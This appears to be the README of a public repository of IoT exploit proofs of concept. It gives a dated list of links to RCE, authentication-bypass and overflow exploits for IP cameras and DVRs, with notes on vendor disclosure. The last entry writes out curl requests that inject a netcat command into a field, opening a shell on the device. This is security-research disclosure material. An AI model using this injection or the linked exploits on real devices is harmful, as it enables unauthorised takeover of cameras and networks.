
Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.
misc PoC - Internet of (In)Security Things
Well worth to read about these crappy (in)security things: https://ipvm.com/reports/security-exploits
2021-10-19
All credit to Watchful_IP (https://watchfulip.github.io/)
https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py
2021-10-06
Details: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
PoC: https://github.com/mcw0/DahuaConsole
2021-09-06
Two independent authentication bypass.
Due to the very high potential of another "Dahua mass hack", I will keep Full Disclosure details until October 6, 2021.
Highly recommend upgrading the firmware until then.
https://www.dahuasecurity.com/support/cybersecurity/details/957
2020-05-09
https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py
2020-02-29
https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py
2020-02-15
Contact established during this week with Dahua PSIRT, details, PoC and proof for 23 different cloud suppliers has been provided. I will also follow the new trial of Google Zero 'Policy and Disclosure: 2020 Edition' (as it make sense to me), meaning I will publish after 90 days, regardless if Dahua would release updates before or after 09.05.2020 19:00 UTC (May 9, 2020 19:00 UTC).
Dahua, please fix and make updates available before this date...
Reference: Google Zero 'Policy and Disclosure: 2020 Edition': https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html
2020-02-10
I've just disclosed creadentials leaks (ending up in clear text) from Dahua SDK to Dahua PSIRT, let see how they will take this information. Pretty bad when there is +20 different cloud providers involved... 90 days ticking from today.
2020-01-20
New repository created where I plan to push some tools.
First out: Dahua-JSON-Debug-Console-v2.py
2019-10-06 (old stuff)
Anonymously detect Model and Firmware version of Axis devices (1998 - 2019).
https://github.com/mcw0/PoC/blob/master/axis-detect.py
2019-08-20
https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py
2019-08-06
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
All technical details along with python PoC will be posted here August 20, 2019.
2019-05-15
Multiple Stack Overflow, RCE, disclosure username/password in clear text and more
https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py
2019-04-10
This script will use Dahua 'DHIP' P2P binary protocol, that works on normal HTTP/HTTPS ports and TCP/5000
Will attach to Dahua devices internal 'Debug Console' using JSON (same type as the former debug on TCP/6789)
https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py
Have fun, bashis
2019-01-23
Greetings, long time and no publish ...
I am still around and doing my research, but the news is that I also try to work with VDOO (https://www.vdoo.com/) for vendor management, and this has unfortunately delayed my Full Disclosure process somewhat ...
Anyway, several interesting researches coming up as Full Disclosure here on my GitHub.
With the collaboration with VDOO I can work with that I like to do, and not waste time with the vendors who do (not want | don't understand | want to ignore | want to delay | whatever).
The latest are some Reolink (https://reolink.com/) stuff, which you will find here: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.
2018-06-18
AVTECH {DVR/NVR/IPC} Heap Overflow, IPCP API, RCE
https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt
https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py
2018-06-03
Reolink {IPC} RCE (Authenticated)
https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py
2018-04-09
Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
2018-03-05
AVTECH {DVR/NVR/IPC} Authenticated RCE
https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py
2018-02-01
Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
Geovision Inc. IP Camera & Video Server Remote Command Execution PoC https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
2018-01-22
Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd. Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py
2018-01-15
Small OpenSSL wrapper to looping different encryption keys/digest and cipher on Foscam IPC Firmware images. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py
Deobfuscate strings/login/password/cryptokey in misc Foscam IPC binaries and libs https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py
2017-12-22
https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt
2017-12-14
https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt
2017-12-05
https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c
2017-12-03
// Enable 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Add to 'IP Filter' and execute
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Disable 'IP Filter'